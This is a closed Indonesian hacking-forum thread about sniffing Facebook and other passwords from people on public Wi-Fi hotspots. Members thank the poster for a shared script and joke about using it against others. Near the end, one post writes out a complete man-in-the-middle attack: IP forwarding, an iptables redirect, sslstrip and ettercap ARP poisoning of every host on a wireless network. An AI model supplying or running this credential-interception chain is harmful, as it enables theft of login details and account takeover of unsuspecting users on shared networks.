Thread Closed
[Share] Sniffing password FB dkk dengen script
(05-19-2012, 11:56 PM)Veronochi Wrote: bermanfaat bangtz nie kalo lagi di hotsepotan klo ada orang berisik ya kan...

wkwkwk . . . bisa aja OmSmile
Spoiler! :
<<Back|Track
☆‍‍‍‍☆‍‍‍‍☆‍‍‍‍☆☆


work ! Smile thanks om scriptnya..

inget jangan digunain untuk kejahatan Tongue
Hati Yang Gembira Adalah Obat

saya coba kok kagak ada yg nyangkut ya om ?
padahal udah nggu lama

gua gak paham bang... mohon bimbinganya.cz member baru...

perlu baca ulang page 1-25 neh ane susah amir..
Huh

(05-27-2012, 10:11 AM)bocahbocahkecil Wrote: perlu baca ulang page 1-25 neh ane susah amir..
Huh

semangka madu om ^_^ Smile AngelAngel

di tempat ane work dengan baik Big Grin . . tapi kasihan FBnya jadi lemot Big Grin . . kayak di plood Confused
pengguna baru Imoet

izin coba om, maklum masi anak pengguna baru

Thank you~~Took study the sniffer principle i not will

Mau tanya nih, kok ettercapku cuma menangkap paket http dari laptopku... dia malah tidak menangkap paket http dari laptop lain dalam jaringan yang sama Big Grin

Aku pake yang seperti ini
[email protected]:~# echo 1 > /proc/sys/net/ipv4/ip_forward
[email protected]:~# iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080
[email protected]:~# sslstrip -a -k -l 8080

[email protected]:~# ettercap -Tqi wlan0 -M arp // //
Backtrack
Kisah tentang kita dan Linux


Thread Closed


Users browsing this thread: 2 Guest(s)